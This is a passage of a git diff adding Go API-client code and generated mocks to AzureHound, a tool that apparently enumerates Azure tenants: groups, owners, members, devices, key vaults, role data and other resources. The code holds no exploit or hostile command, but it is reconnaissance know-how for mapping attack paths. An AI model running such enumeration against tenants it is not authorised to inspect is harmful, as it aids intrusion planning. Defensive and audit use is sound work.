return constants.AzureChina().MicrosoftGraphUrl + case constants.Cloud: + return constants.AzureCloud().MicrosoftGraphUrl + case constants.Germany: + return constants.AzureGermany().MicrosoftGraphUrl + case constants.USGovL4: + return constants.AzureUSGovernment().MicrosoftGraphUrl + case constants.USGovL5: + return constants.AzureUSGovernmentL5().MicrosoftGraphUrl + default: + return defaultUrl + } +} + +func (s Config) GraphUrl() string { + return strings.TrimSuffix(GraphUrl(s.Region, s.Graph), "/") +} + +func ResourceManagerUrl(region string, defaultUrl string) string { + switch region { + case constants.China: + return constants.AzureChina().ResourceManagerUrl + case constants.Cloud: + return constants.AzureCloud().ResourceManagerUrl + case constants.Germany: + return constants.AzureGermany().ResourceManagerUrl + case constants.USGovL4: + return constants.AzureUSGovernment().ResourceManagerUrl + case constants.USGovL5: + return constants.AzureUSGovernmentL5().ResourceManagerUrl + default: + return defaultUrl + } +} + +func (s Config) ResourceManagerUrl() string { + return strings.TrimSuffix(ResourceManagerUrl(s.Region, s.Graph), "/") +} diff --git a/client/container_registries.go b/client/container_registries.go new file mode 100644 index 0000000..cc7d1ed --- /dev/null +++ b/client/container_registries.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureContainerRegistries https://learn.microsoft.com/en-us/rest/api/containerregistry/registries/list?view=rest-containerregistry-2023-01-01-preview +func (s *azureClient) ListAzureContainerRegistries(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ContainerRegistry] { + var ( + out = make(chan AzureResult[azure.ContainerRegistry]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.ContainerRegistry/registries", subscriptionId) + params = query.RMParams{ApiVersion: "2023-01-01-preview"} + ) + + go getAzureObjectList[azure.ContainerRegistry](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/devices.go b/client/devices.go new file mode 100644 index 0000000..d4935a2 --- /dev/null +++ b/client/devices.go @@ -0,0 +1,56 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureDevices https://learn.microsoft.com/en-us/graph/api/device-list?view=graph-rest-1.0 +func (s *azureClient) ListAzureDevices(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Device] { + var ( + out = make(chan AzureResult[azure.Device]) + path = fmt.Sprintf("/%s/devices", constants.GraphApiVersion) + ) + + if params.Top == 0 { + params.Top = 999 + } + + go getAzureObjectList[azure.Device](s.msgraph, ctx, path, params, out) + + return out +} + +// ListAzureDeviceRegisteredOwners https://learn.microsoft.com/en-us/graph/api/device-list-registeredowners?view=graph-rest-beta +func (s *azureClient) ListAzureDeviceRegisteredOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] { + var ( + out = make(chan AzureResult[json.RawMessage]) + path = fmt.Sprintf("/%s/devices/%s/registeredOwners", constants.GraphApiBetaVersion, objectId) + ) + + go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out) + + return out +} diff --git a/client/function_apps.go b/client/function_apps.go new file mode 100644 index 0000000..9c924d0 --- /dev/null +++ b/client/function_apps.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureFunctionApps +func (s *azureClient) ListAzureFunctionApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.FunctionApp] { + var ( + out = make(chan AzureResult[azure.FunctionApp]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Web/sites", subscriptionId) + params = query.RMParams{ApiVersion: "2022-03-01"} + ) + + go getAzureObjectList[azure.FunctionApp](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/groups.go b/client/groups.go new file mode 100644 index 0000000..824c8fe --- /dev/null +++ b/client/groups.go @@ -0,0 +1,72 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureADGroups https://learn.microsoft.com/en-us/graph/api/group-list?view=graph-rest-beta +func (s *azureClient) ListAzureADGroups(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Group] { + var ( + out = make(chan AzureResult[azure.Group]) + path = fmt.Sprintf("/%s/groups", constants.GraphApiVersion) + ) + + if params.Top == 0 { + params.Top = 99 + } + + go getAzureObjectList[azure.Group](s.msgraph, ctx, path, params, out) + + return out +} + +// ListAzureADGroupOwners https://learn.microsoft.com/en-us/graph/api/group-list-owners?view=graph-rest-beta +func (s *azureClient) ListAzureADGroupOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] { + var ( + out = make(chan AzureResult[json.RawMessage]) + path = fmt.Sprintf("/%s/groups/%s/owners", constants.GraphApiBetaVersion, objectId) + ) + + if params.Top == 0 { + params.Top = 99 + } + + go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out) + + return out +} + +// ListAzureADGroupMembers https://learn.microsoft.com/en-us/graph/api/group-list-members?view=graph-rest-beta +func (s *azureClient) ListAzureADGroupMembers(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] { + var ( + out = make(chan AzureResult[json.RawMessage]) + path = fmt.Sprintf("/%s/groups/%s/members", constants.GraphApiBetaVersion, objectId) + ) + + go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out) + + return out +} diff --git a/client/keyvaults.go b/client/keyvaults.go new file mode 100644 index 0000000..c7735c7 --- /dev/null +++ b/client/keyvaults.go @@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureKeyVaults https://learn.microsoft.com/en-us/rest/api/keyvault/keyvault/vaults/list-by-subscription?view=rest-keyvault-keyvault-2019-09-01 +func (s *azureClient) ListAzureKeyVaults(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.KeyVault] { + var ( + out = make(chan AzureResult[azure.KeyVault]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.KeyVault/vaults", subscriptionId) + ) + + if params.ApiVersion == "" { + params.ApiVersion = "2019-09-01" + } + + go getAzureObjectList[azure.KeyVault](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/logic_apps.go b/client/logic_apps.go new file mode 100644 index 0000000..711bfe2 --- /dev/null +++ b/client/logic_apps.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureLogicApps https://learn.microsoft.com/en-us/rest/api/logic/workflows/list-by-subscription?view=rest-logic-2016-06-01 +func (s *azureClient) ListAzureLogicApps(ctx context.Context, subscriptionId string, filter string, top int32) <-chan AzureResult[azure.LogicApp] { + var ( + out = make(chan AzureResult[azure.LogicApp]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Logic/workflows", subscriptionId) + params = query.RMParams{ApiVersion: "2016-06-01", Filter: filter, Top: top} + ) + + go getAzureObjectList[azure.LogicApp](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/managed_clusters.go b/client/managed_clusters.go new file mode 100644 index 0000000..05c6b19 --- /dev/null +++ b/client/managed_clusters.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureManagedClusters https://learn.microsoft.com/en-us/rest/api/servicefabric/managedclusters/managed-clusters/list-by-subscription?view=rest-servicefabric-managedclusters-2021-07-01 +func (s *azureClient) ListAzureManagedClusters(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ManagedCluster] { + var ( + out = make(chan AzureResult[azure.ManagedCluster]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.ContainerService/managedClusters", subscriptionId) + params = query.RMParams{ApiVersion: "2021-07-01"} + ) + + go getAzureObjectList[azure.ManagedCluster](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/management_groups.go b/client/management_groups.go new file mode 100644 index 0000000..a269b92 --- /dev/null +++ b/client/management_groups.go @@ -0,0 +1,52 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureManagementGroups https://learn.microsoft.com/en-us/rest/api/managementgroups/management-groups/list?view=rest-managementgroups-2020-05-01 +func (s *azureClient) ListAzureManagementGroups(ctx context.Context, skipToken string) <-chan AzureResult[azure.ManagementGroup] { + var ( + out = make(chan AzureResult[azure.ManagementGroup]) + path = "/providers/Microsoft.Management/managementGroups" + params = query.RMParams{ApiVersion: "2020-05-01", SkipToken: skipToken} + ) + + go getAzureObjectList[azure.ManagementGroup](s.resourceManager, ctx, path, params, out) + + return out +} + +// ListAzureManagementGroupDescendants https://learn.microsoft.com/en-us/rest/api/managementgroups/management-groups/get-descendants?view=rest-managementgroups-2020-05-01 +func (s *azureClient) ListAzureManagementGroupDescendants(ctx context.Context, groupId string, top int32) <-chan AzureResult[azure.DescendantInfo] { + var ( + out = make(chan AzureResult[azure.DescendantInfo]) + path = fmt.Sprintf("/providers/Microsoft.Management/managementGroups/%s/descendants", groupId) + params = query.RMParams{ApiVersion: "2020-05-01", Top: top} + ) + + go getAzureObjectList[azure.DescendantInfo](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/mocks/client.go b/client/mocks/client.go new file mode 100644 index 0000000..97dfeb3 --- /dev/null +++ b/client/mocks/client.go @@ -0,0 +1,515 @@ +// Code generated by MockGen. DO NOT EDIT. +// Source: github.com/bloodhoundad/azurehound/v2/client (interfaces: AzureClient) + +// Package mocks is a generated GoMock package. +package mocks + +import ( + "context" + "encoding/json" + "reflect" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +// MockAzureClient is a mock of AzureClient interface. +type MockAzureClient struct { + ctrl *gomock.Controller + recorder *MockAzureClientMockRecorder +} + +// MockAzureClientMockRecorder is the mock recorder for MockAzureClient. +type MockAzureClientMockRecorder struct { + mock *MockAzureClient +} + +// NewMockAzureClient creates a new mock instance. +func NewMockAzureClient(ctrl *gomock.Controller) *MockAzureClient { + mock := &MockAzureClient{ctrl: ctrl} + mock.recorder = &MockAzureClientMockRecorder{mock} + return mock +} + +// EXPECT returns an object that allows the caller to indicate expected use. +func (m *MockAzureClient) EXPECT() *MockAzureClientMockRecorder { + return m.recorder +} + +// CloseIdleConnections mocks base method. +func (m *MockAzureClient) CloseIdleConnections() { + m.ctrl.T.Helper() + m.ctrl.Call(m, "CloseIdleConnections") +} + +// CloseIdleConnections indicates an expected call of CloseIdleConnections. +func (mr *MockAzureClientMockRecorder) CloseIdleConnections() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CloseIdleConnections", reflect.TypeOf((*MockAzureClient)(nil).CloseIdleConnections)) +} + +// GetAzureADOrganization mocks base method. +func (m *MockAzureClient) GetAzureADOrganization(arg0 context.Context, arg1 []string) (*azure.Organization, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "GetAzureADOrganization", arg0, arg1) + ret0, _ := ret[0].(*azure.Organization) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// GetAzureADOrganization indicates an expected call of GetAzureADOrganization. +func (mr *MockAzureClientMockRecorder) GetAzureADOrganization(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetAzureADOrganization", reflect.TypeOf((*MockAzureClient)(nil).GetAzureADOrganization), arg0, arg1) +} + +// GetAzureADTenants mocks base method. +func (m *MockAzureClient) GetAzureADTenants(arg0 context.Context, arg1 bool) (azure.TenantList, error) { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "GetAzureADTenants", arg0, arg1) + ret0, _ := ret[0].(azure.TenantList) + ret1, _ := ret[1].(error) + return ret0, ret1 +} + +// GetAzureADTenants indicates an expected call of GetAzureADTenants. +func (mr *MockAzureClientMockRecorder) GetAzureADTenants(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetAzureADTenants", reflect.TypeOf((*MockAzureClient)(nil).GetAzureADTenants), arg0, arg1) +} + +// ListAzureADAppOwners mocks base method. +func (m *MockAzureClient) ListAzureADAppOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADAppOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADAppOwners indicates an expected call of ListAzureADAppOwners. +func (mr *MockAzureClientMockRecorder) ListAzureADAppOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADAppOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADAppOwners), arg0, arg1, arg2) +} + +// ListAzureADAppRoleAssignments mocks base method. +func (m *MockAzureClient) ListAzureADAppRoleAssignments(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[azure.AppRoleAssignment] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADAppRoleAssignments", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.AppRoleAssignment]) + return ret0 +} + +// ListAzureADAppRoleAssignments indicates an expected call of ListAzureADAppRoleAssignments. +func (mr *MockAzureClientMockRecorder) ListAzureADAppRoleAssignments(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADAppRoleAssignments", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADAppRoleAssignments), arg0, arg1, arg2) +} + +// ListAzureADApps mocks base method. +func (m *MockAzureClient) ListAzureADApps(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Application] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADApps", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Application]) + return ret0 +} + +// ListAzureADApps indicates an expected call of ListAzureADApps. +func (mr *MockAzureClientMockRecorder) ListAzureADApps(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADApps), arg0, arg1) +} + +// ListAzureADGroupMembers mocks base method. +func (m *MockAzureClient) ListAzureADGroupMembers(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADGroupMembers", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADGroupMembers indicates an expected call of ListAzureADGroupMembers. +func (mr *MockAzureClientMockRecorder) ListAzureADGroupMembers(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADGroupMembers", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADGroupMembers), arg0, arg1, arg2) +} + +// ListAzureADGroupOwners mocks base method. +func (m *MockAzureClient) ListAzureADGroupOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADGroupOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADGroupOwners indicates an expected call of ListAzureADGroupOwners. +func (mr *MockAzureClientMockRecorder) ListAzureADGroupOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADGroupOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADGroupOwners), arg0, arg1, arg2) +} + +// ListAzureADGroups mocks base method. +func (m *MockAzureClient) ListAzureADGroups(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Group] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADGroups", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Group]) + return ret0 +} + +// ListAzureADGroups indicates an expected call of ListAzureADGroups. +func (mr *MockAzureClientMockRecorder) ListAzureADGroups(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADGroups", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADGroups), arg0, arg1) +} + +// ListAzureADRoleAssignments mocks base method. +func (m *MockAzureClient) ListAzureADRoleAssignments(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.UnifiedRoleAssignment] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADRoleAssignments", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.UnifiedRoleAssignment]) + return ret0 +} + +// ListAzureADRoleAssignments indicates an expected call of ListAzureADRoleAssignments. +func (mr *MockAzureClientMockRecorder) ListAzureADRoleAssignments(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADRoleAssignments", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADRoleAssignments), arg0, arg1) +} + +// ListAzureADRoles mocks base method. +func (m *MockAzureClient) ListAzureADRoles(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Role] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADRoles", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Role]) + return ret0 +} + +// ListAzureADRoles indicates an expected call of ListAzureADRoles. +func (mr *MockAzureClientMockRecorder) ListAzureADRoles(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADRoles", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADRoles), arg0, arg1) +} + +// ListAzureADServicePrincipalOwners mocks base method. +func (m *MockAzureClient) ListAzureADServicePrincipalOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADServicePrincipalOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADServicePrincipalOwners indicates an expected call of ListAzureADServicePrincipalOwners. +func (mr *MockAzureClientMockRecorder) ListAzureADServicePrincipalOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADServicePrincipalOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADServicePrincipalOwners), arg0, arg1, arg2) +} + +// ListAzureADServicePrincipals mocks base method. +func (m *MockAzureClient) ListAzureADServicePrincipals(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.ServicePrincipal] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADServicePrincipals", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ServicePrincipal]) + return ret0 +} + +// ListAzureADServicePrincipals indicates an expected call of ListAzureADServicePrincipals. +func (mr *MockAzureClientMockRecorder) ListAzureADServicePrincipals(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADServicePrincipals", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADServicePrincipals), arg0, arg1) +} + +// ListAzureADTenants mocks base method. +func (m *MockAzureClient) ListAzureADTenants(arg0 context.Context, arg1 bool) <-chan client.AzureResult[azure.Tenant] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADTenants", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Tenant]) + return ret0 +} + +// ListAzureADTenants indicates an expected call of ListAzureADTenants. +func (mr *MockAzureClientMockRecorder) ListAzureADTenants(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADTenants", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADTenants), arg0, arg1) +} + +// ListAzureADUsers mocks base method. +func (m *MockAzureClient) ListAzureADUsers(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.User] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADUsers", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.User]) + return ret0 +} + +// ListAzureADUsers indicates an expected call of ListAzureADUsers. +func (mr *MockAzureClientMockRecorder) ListAzureADUsers(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADUsers", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADUsers), arg0, arg1) +} + +// ListAzureAutomationAccounts mocks base method. +func (m *MockAzureClient) ListAzureAutomationAccounts(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.AutomationAccount] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureAutomationAccounts", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.AutomationAccount]) + return ret0 +} + +// ListAzureAutomationAccounts indicates an expected call of ListAzureAutomationAccounts. +func (mr *MockAzureClientMockRecorder) ListAzureAutomationAccounts(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureAutomationAccounts", reflect.TypeOf((*MockAzureClient)(nil).ListAzureAutomationAccounts), arg0, arg1) +} + +// ListAzureContainerRegistries mocks base method. +func (m *MockAzureClient) ListAzureContainerRegistries(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.ContainerRegistry] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureContainerRegistries", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ContainerRegistry]) + return ret0 +} + +// ListAzureContainerRegistries indicates an expected call of ListAzureContainerRegistries. +func (mr *MockAzureClientMockRecorder) ListAzureContainerRegistries(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureContainerRegistries", reflect.TypeOf((*MockAzureClient)(nil).ListAzureContainerRegistries), arg0, arg1) +} + +// ListAzureDeviceRegisteredOwners mocks base method. +func (m *MockAzureClient) ListAzureDeviceRegisteredOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureDeviceRegisteredOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureDeviceRegisteredOwners indicates an expected call of ListAzureDeviceRegisteredOwners. +func (mr *MockAzureClientMockRecorder) ListAzureDeviceRegisteredOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureDeviceRegisteredOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureDeviceRegisteredOwners), arg0, arg1, arg2) +} + +// ListAzureDevices mocks base method. +func (m *MockAzureClient) ListAzureDevices(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Device] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureDevices", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Device]) + return ret0 +} + +// ListAzureDevices indicates an expected call of ListAzureDevices. +func (mr *MockAzureClientMockRecorder) ListAzureDevices(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureDevices", reflect.TypeOf((*MockAzureClient)(nil).ListAzureDevices), arg0, arg1) +} + +// ListAzureFunctionApps mocks base method. +func (m *MockAzureClient) ListAzureFunctionApps(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.FunctionApp] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureFunctionApps", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.FunctionApp]) + return ret0 +} + +// ListAzureFunctionApps indicates an expected call of ListAzureFunctionApps. +func (mr *MockAzureClientMockRecorder) ListAzureFunctionApps(arg0, arg1 interface{}) *gomock.Call { + 